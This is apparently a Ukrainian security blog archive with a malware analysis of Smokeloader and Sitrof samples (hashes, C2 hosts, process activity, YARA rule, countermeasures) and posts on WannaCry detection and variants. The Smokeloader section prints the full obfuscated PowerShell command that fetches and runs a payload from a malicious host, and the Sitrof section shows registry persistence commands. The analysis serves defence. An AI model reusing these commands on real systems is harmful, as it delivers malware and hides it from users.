Tag Archive | vATD

IOC_sitrof_smokeldr_230218

Доброго вечора, панове.

До вашої уваги підсумки по сьогоднішнім зразкам.

Отже на аналіз було передано: уже знайомий нам #smokeloader та троян #sitrof (fortis).

Рівень загрози по обом – середній. Для тих, хто уважно читає наші поради – низький в обох випадках.

 

Трохи аналітики:

#smokeloader

 

  • Враховуючи почерк цієї команди слід очікувати нових зразків із цим посиланням
  • Схема не змінилася – обфусковані JS скрипти в архіві
  • Скрипт чітко вказує адресу та ім’я, під яким payload записується на диск
  • Завантаження основної частини засобами Powershell
  • Не потребує прав Адміністратора
  • Цього разу змінили домен та застосували обфускацію команд при передачі

#sitrof

  • Цей штам дуже мало застосовувався
  • Повторний запуск = новий клон (розмір*2, інше ім’я, мімікрія під системні файли) – цей модуль взяли у #zbot
  • Чітка атрибутика (завдяки Techhelplist) по User Agent (POST /ftsri.php?reg)
  • Не потребує прав Адміністратора
  • Пристосований до збору інформації
  • Говорити про нього як про інструмент складної атаки не варто, це швидше розвідка за допомогою нетипового семплу
  • Проте він досить “незграбний” і створює багато артефактів, тому схиляюсь до думки що це потяг до екзотики, а не прояв майстерності
  • Вносить зміни в реєстр щоб приховати своє тіло (старий трюк)

 

Схема атаки:

 

#smokeloader

 

email > Attach (RAR) > JS > WSCRIPT > CMD > Powershell > single hardcoded URL >

'h11p:\ vivedoc{.} ru/document/pax.exe' >  $env:temp + '\1004.exe

* (минулого разу – enterwords{.} ru/uadoc/crsse.exe > 11054.exe, до того - 63753.exe, а ще раніше 5541.exe)

 

#sitrof

Вектор доставки не підтверджено.

 

Маркери IOC:

 

#smokeloader

Приєднання (архів):

SHA-256            843f898ca145f00e643019c64376491882431fbbc4f187cd6e011050375c6829
File name            рахунок фактура 21.02.2018р.rar
File size              85.71 KB

 

скрипт приманка:

SHA-256            3010c97b0589cc954574e209f93cf4499e64cf812fb12b37e1aec7b0e4ffbedd
File name           рах.фак. 75-КТ.xls.js
File size              33.47 KB

основна частина:

SHA-256            e67bc39af0cd4e5bf5d346927c06c2af2d9209d794ad98c9387d797b914f3423
File name           pax.exe >> $env:temp + '\1004.exe
File size              345 KB

 

#sitrof

основна частина:

SHA-256            59ab6cb69712d82f3e13973ecc7e7d2060914cea6238d338203a69bac95fd96c
File name           System Volume Information.exe
File size              41.56 KB

Наступні ітерації запуску:

>2га
SHA-256    21a25b82388ff6794dcfecf238d035c6f71cfd7a453f1123c4f3bd01b0425df6
File name   mstray.exe
File size    83.13 KB

>3тя
SHA-256        af4d350c56c49fe3353d3ccb9fd10507e8ac35ccced7a90abd66d12b06447275
File name   ftshost.exe
File size    166.26 KB

>4та
SHA-256        86dd5923f69f8530c7cb7107dcca0b5518fcf7cb249da19551a2f963d40e63be
File name   mshost.exe
File size    332.52 KB

>5та
SHA-256    5b2740e47f7dace861e9e6619936fbaeb93a3834ee19f7bfc4f979cdb12cdf69
File name   mssvc.exe
File size    665.04 KB

 

Мережеві IOC:

 

#smokeloader

 

завантаження payload – досі активна!

104.18.59.143    vivedoc{.} ru      GET /document/pax.exe HTTP/1.1
(минулого разу -  92.63.197.13      enterwords[.]ru   GET /uadoc/crsse.exe HTTP/1.1)

 

трафік скомпрометованої системи – сервер контролю (так само як і минулого разу)

92.63.197.13      honeyindoc{.} ru POST / HTTP/1.1  (application/x-www-form-urlencoded)

 

#sitrof

c2 :

yourssagregator{.} comlu{.} com/ftsri.php
allnewsmedia{.} webatu{.} com/ftsri.php

 

Передача зібраної інформації (система, користувач, CPU)

153.92.0.100      HTTP 346   lovecatalog{.} comlu{.} com POST /ftsri.php?reg&ver=4.100000&comp=agent&addinfo=test@agent;%202%20x86%20"Intel"%20processor(s) HTTP/1.1
153.92.0.100      HTTP 215   yourssagregator{.} comlu{.} com  POST /ftsri.php?get&version HTTP/1.1
153.92.0.100      HTTP 244   yourssagregator{.} comlu{.} com  GET /ftsri.php?get&module=\023=K6\263\023;W\03#JEB HTTP/1.1

 

Трафік скомпрометованої системи

mshost.exe1600               TCP        153.92.0.100       80           CLOSE_WAIT                                                                                                                     
mshost.exe1600               TCP        153.92.0.100       80           CLOSE_WAIT                                                                                                                                     
mshost.exe1600               TCP        104.20.67.46       443         CLOSE_WAIT

 

Активність по процесам:

 

#smokeloader

 

Запуск скрипта-приманки ініціює завантаження основної частини засобами Powershell

Ліричний відступ, нагадую, що ENS обладнано сигнатруами для блокування певних команд Powershell

Їх просто потрібно активувати:

На відміну від минулого разу застосували ще сильнішу обфускацію команд

 

"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\рах.фак. 75-КТ.xls.js"

"C:\Windows\System32\cmd.exe" /k set _a111=powe&& set _a222=rsh&& set _a333=ell&& call %_a111%%_a222%%_a333% $CsbSHQUu = 'GyxDSwG';$a = 'Msxml' + '2.XML' + 'HTTP';$z5iLQa8 = 'pIPBA';$b = 'ADO' + 'DB.' + 'Stream';$kacCc = 'mEKyiYy1';$c = 'G' + 'E' + 'T';$JnheMsVo = 'SHblsw';$d = 1 - 1 + 1;$pDhstfie = 'zwqEzO';$hr = New-Object -ComObject $a;$ddbeu = 'KfHL80';$ab = New-Object -ComObject $b;$jUi2Pmko = 'GNbYLYU';$path = $env:temp + '\1004.exe';$Nn8NG = 'ISrrb';$hr.open($c, 'http://vivedoc{.} ru/document/pax.exe', 0);$FbWdaAPm = 'MuwGl';$hr.send();$tkzNp = 'aummFLV';$NWHLjOHp = 'TXzrW';$hryQYP = 'NipavHP';$otGXcz = 'YxEi0';$ab.open();$leJkI = 'b7CaDKAEf';$ab.type = $d;$XhzVqK = 'uG0QddHO';$ab.write($hr.responseBody);$RZAQmIf3 = 'xckwyBI';$ab.savetofile($path);$zGsspdDz = 'rZ4chUv';$ab.close();$zyOHSXL = 'PyCybbp';$cOo8LIl = 'C7ms3yUc';$Cexglw = 'YI128';$ankqLgZP = 'TKwSsN';$DgphQkeP = 'orASsm';$cwndO = 'cJPoPB';$bXBnK = 'HzkFOlL';Start-Process $path;

powershell  $CsbSHQUu = 'GyxDSwG';$a = 'Msxml' + '2.XML' + 'HTTP';$z5iLQa8 = 'pIPBA';$b = 'ADO' + 'DB.' + 'Stream';$kacCc = 'mEKyiYy1';$c = 'G' + 'E' + 'T';$JnheMsVo = 'SHblsw';$d = 1 - 1 + 1;$pDhstfie = 'zwqEzO';$hr = New-Object -ComObject $a;$ddbeu = 'KfHL80';$ab = New-Object -ComObject $b;$jUi2Pmko = 'GNbYLYU';$path = $env:temp + '\1004.exe';$Nn8NG = 'ISrrb';$hr.open($c, 'http://vivedoc{.} ru/document/pax.exe', 0);$FbWdaAPm = 'MuwGl';$hr.send();$tkzNp = 'aummFLV';$NWHLjOHp = 'TXzrW';$hryQYP = 'NipavHP';$otGXcz = 'YxEi0';$ab.open();$leJkI = 'b7CaDKAEf';$ab.type = $d;$XhzVqK = 'uG0QddHO';$ab.write($hr.responseBody);$RZAQmIf3 = 'xckwyBI';$ab.savetofile($path);$zGsspdDz = 'rZ4chUv';$ab.close();$zyOHSXL = 'PyCybbp';$cOo8LIl = 'C7ms3yUc';$Cexglw = 'YI128';$ankqLgZP = 'TKwSsN';$DgphQkeP = 'orASsm';$cwndO = 'cJPoPB';$bXBnK = 'HzkFOlL';Start-Process $path;

"C:\tmp\1004.exe"

 

Закріплення через HCU (так само як і минулого разу)

 

Policies                      c:\users\operator\appdata\roaming\microsoft\tjerrirf\rtdiubth.exe           
C:\Users\operator\AppData\Roaming\Microsoft\tjerrirf
HKEY_USERS\S-1-5-21-136527031-2493574210-1221074019-1000\Software\Microsoft\Windows\CurrentVersion\Run

 

#sitrof

Після запуску дублює своє тіло у довільний підкаталог operator\AppData\Roaming\Microsoft\*\ (SDL, DLL, etc)

Свою копію додає до списку автозавантаження

Ліричний відступ, нагадую, що ENS обладнано вбудованим правило для блокування такої активності

Просто активуйте правило:

 

"C:\Users\operator\Desktop\System Volume Information.exe"
"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v mqkldrv /t REG_SZ /d "C:\Users\operator\AppData\Roaming\Microsoft\bin\mshost.exe" /f


"C:\Users\operator\AppData\Roaming\Microsoft\bin\mshost.exe"
"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v mqkldrv /t REG_SZ /d "C:\Users\operator\AppData\Roaming\Microsoft\bin\mshost.exe" /f
"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v Hidden /t REG_DWORD /d 0x00000000 /f
"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /t REG_DWORD /d 0x00000001 /f

 

Закріплення

mqkldrv                     c:\users\operator\appdata\roaming\microsoft\bin\mshost.exe        02.09.2007 13:34

McAfee

YARA (c) @ Techhelplistcom

 

rule sitrof_fortis {

meta:
author = ” J from THL <j@techhelplist.com>”
date = “2018/23”
reference = “https://www.virustotal.com/#/file/59ab6cb69712d82f3e13973ecc7e7d2060914cea6238d338203a69bac95fd96c/community&#8221;
version = 1
maltype = “Stealer”
filetype = “memory”

strings:

$a = “?get&version”
$b = “?reg&ver=”
$c = “?get&exe”
$d = “?get&download”
$e = “?get&module”
$f = “&ver=”
$g = “&comp=”
$h = “&addinfo=”
$i = “%s@%s; %s %s \”%s\” processor(s)”
$j = “User-Agent: fortis”

condition:
6 of them
}

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • (#sitrof) YARA правило для визначення активності – дякую Techhelplist
  • (#sitrof) Чіткий контроль та блокування спроб зміни списку автозавантаження – нагадую про вбудовані можливості McAfee ENS – правила Access Protection
  • (#smokeloader) Блокування доступу до мережі Інтернет для процесу Powershell (варіант 1й)
  • (#smokeloader) Деактивація механізму Windows Script Host (варіант 2й)
  • (#smokeloader) Якщо ж Powershell активно застосовується – нагадую про вбудовані можливості McAfee ENS – сигнатури Exploit Prevention
  • (обидва зразки) Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • (#smokeloader) Заборона виклику Powershell через WSCript – додатково захистить від скриптів що йдуть як OLE об’єкти
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

MATD WannaCry Detection Pkg

Доступний пакет оновлення для ATD та vATD для виявлення зразків WannaCry

Важлива новина для користувачів “пісочниці” McAfee.

The Advanced Threat Defense (ATD) WannaCry Content Update is now available.

This release includes new features, fixes, and enhancements including:

  • Added capability to detect WannaCry variants
  • Added Family Classification: WannaCry as a new malware family
  • Enhanced previous Ransomware coverage with additional rules

They are all available on the McAfee Product Downloads site (http://www.mcafee.com/us/downloads/downloads.aspx) with a valid Grant ID.

Auto-downloaded content is available through the ATD Web User Interface at: Manage, Image & Software, Content Update, Detection Pkg.

Процес оновлення vATD і порівняння результатів:

Один із ранніх зразків до оновлення vATD

Той же зразок після оновлення vATD

Дотримуйтеся рекомендацій опублікованих раніше.

Будьте обережні.

VR

wannacry – part one

Через нестачу часу буду публікувати частинами.

12/05/17 почалася хвиля масового зараження новим видом ransomware – WannaCry (wanna decrypt0r, wanna crtyptor).
Основна небезпека і причина такого стрімкого і масового зараження – для розповсюдження цей зразок використовує вразливість SMB протоколу (Eternalblue).
Після того як хоча би один користувач інфікується – по локальній мережі з його системи ransomware поширюється на інші ПК і сервери.
Якщо попередні зразки ransomware шифрували тільки під’єднані мережеві диски, то WannaCry використовує SMB для доступу до усіх ПК в локальній мережі.

McAfee опублікувало додаткові інструкції щодо правил Access Protection для ENS та VSE:

[KB89335] https://kc.mcafee.com/corporate/index?page=content&id=KB89335

Інформація оперативно оновлюється.

Зверніть увагу що внизу статті викладений файл із додатковими сигнатурами (extra.DAT).

– – – – – – – – – – – – //

Довкола цієї атаки зараз багато спекуляцій тому я обмежуся лише відомими мені на даний момент фактами:

  1. Основна точка входу – фішинг із посиланням на JS. Можливо згодом стануть відомі інші способи доставки, але по інформації на зараз – заходять типово через пошту.
  2. Оновлення з бюлетеню MS17-010 які закривають вразливість SMB захищають від розповсюдження, але не від початкового зараження.

Це означає, що вони мають бути встановлені або потрібно блокувати SMB порти (135б 445 уес) але через них іде зараження не зовні а уже з середини.

  1. Мої попередні рекомендації залишаються в силі, а саме:
  • Правило, яке блокує запуск *.exe, *.js*, *.vbs із %AppData%
  • Блокування приєднань із файлами *.vbs , *.js, *.jse, *.exe
  • Впровадження “пісочниці” McAfee ATD
  • Співбесіди з персоналом на тему фішингу, соц. інженерії

– – – – – – – – – – – – //

Не дивлячись на те, що активність Wannacry була призупинена 13/05/17 через реєстрацію доменів, були виявлені інші зразки цього ransomware.
Частина із них не повнофункціональна, а частина шифрує системи без перевірки вразливості SMB та домену.
Нижче наведені семпли у хронологічному порядку їх виявлення.

IOC

File Name smpl0.exe – шифрує без перевірки доменів, скан 445 не проводить
MD5 Hash Identifier 84C82835A5D21BBCF75A61706D8AB549
SHA-1 Hash Identifier 5FF465AFAABCBF0150D1A3AB2C2E74F3A4426467
SHA-256 Hash Identifier ED01EBFBC9EB5BBEA545AF4D01BF5F1071661840480439C6E5BABE8E080E41AA
File Size 3514368 bytes

File Name smpl1.exe – не почав шифрування, перевірка домену IUQERFSODP9IFJAPOSDFJHGOSURIJFAEWRWERGWEA.COM
MD5 Hash Identifier DB349B97C37D22F5EA1D1841E3C89EB4
SHA-1 Hash Identifier E889544AFF85FFAF8B0D0DA705105DEE7C97FE26
SHA-256 Hash Identifier 24D004A104D4D54034DBCFFC2A4B19A11F39008A575AA614EA04703480B1022C
File Size 3723264 bytes

File Name smpl2.exe – не почав шифрування, перевірка домену IFFERFSODP9IFJAPOSDFJHGOSURIJFAEWRWERGWEA.COM
MD5 Hash Identifier D5DCD28612F4D6FFCA0CFEAEFD606BCF
SHA-1 Hash Identifier CF60FA60D2F461DDDFDFCEBF16368E6B539CD9BA
SHA-256 Hash Identifier 32F24601153BE0885F11D62E0A8A2F0280A2034FC981D8184180C5D3B1B9E8CF
File Size 3723264 bytes

File Name smpl3.exe – модуль шифрування не запустився, проте проявився функціонал перевірки вразливості SMB (з’єднання на 445 в межах локальної мережі)
MD5 Hash Identifier D724D8CC6420F06E8A48752F0DA11C66
SHA-1 Hash Identifier 3B669778698972C402F7C149FC844D0DDB3A00E8
SHA-256 Hash Identifier 07C44729E2C570B37DB695323249474831F5861D45318BF49CCF5D2F5C8EA1CD
File Size 3723264 bytes

File Name tasksche.exe – був дропнутий smpl3, шифрування не почав
MD5 Hash Identifier 7F7CCAA16FB15EB1C7399D422F8363E8
SHA-1 Hash Identifier BD44D0AB543BF814D93B719C24E90D8DD7111234
SHA-256 Hash Identifier 2584E1521065E45EC3C17767C065429038FC6291C091097EA8B22C8A502C41DD
File Size 3514368 bytes

– – – – – – – – – – – – – –

Зверніть увагу, що в KB89335 оновили Extra.DAT, він містить сигнатури станом на 14те травня

Дуже рекомендую додати його в еРО та запустити задачу оновлення ENS та VSE

https://kc.mcafee.com/corporate/index?page=content&id=KB89335

Зважаючи на масштаби атаки та результати аналізу отриманих семплів роблю такі проміжні висновки:

  • буде спроба повторних атак через цю вразливість та інші (які були опубліковані в результаті витоку)
  • по мережі досі гуляють семпли, які шифрують навіть пропатчену систему
  • на тих системах, які WannaCry атакував по SMB зловмисники отримували доступ на рівні SYSTEM

Проміжні висновки:

  • Патчі (оновлення) з бюлетеню MS17-010 повинні бути встановлені але наявність патчу не означає, що конкретно цей хост не буде пошифровано у разі активації приманки
  • Зважаючи на відносно малий % монетизації (станом на зараз на bitcoin гаманцях усього $54К, це сума викупу за ~ 181 хост) шифрування могло бути відволікаючим маневром
  • Отримані семпли попри локалізацію виглядають тестовою версією

Будьте обережні.

Посилюйте захист за наданими раніше рекомендаціями.

Проводьте співбесіди з користувачами.

PS

Перелік використаних джерел:

https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/

https://securingtomorrow.mcafee.com/mcafee-labs/analysis-wannacry-ransomware/

https://kc.mcafee.com/corporate/index?page=content&id=KB89335

https://blog.comae.io/wannacry-new-variants-detected-b8908fefea7e

VR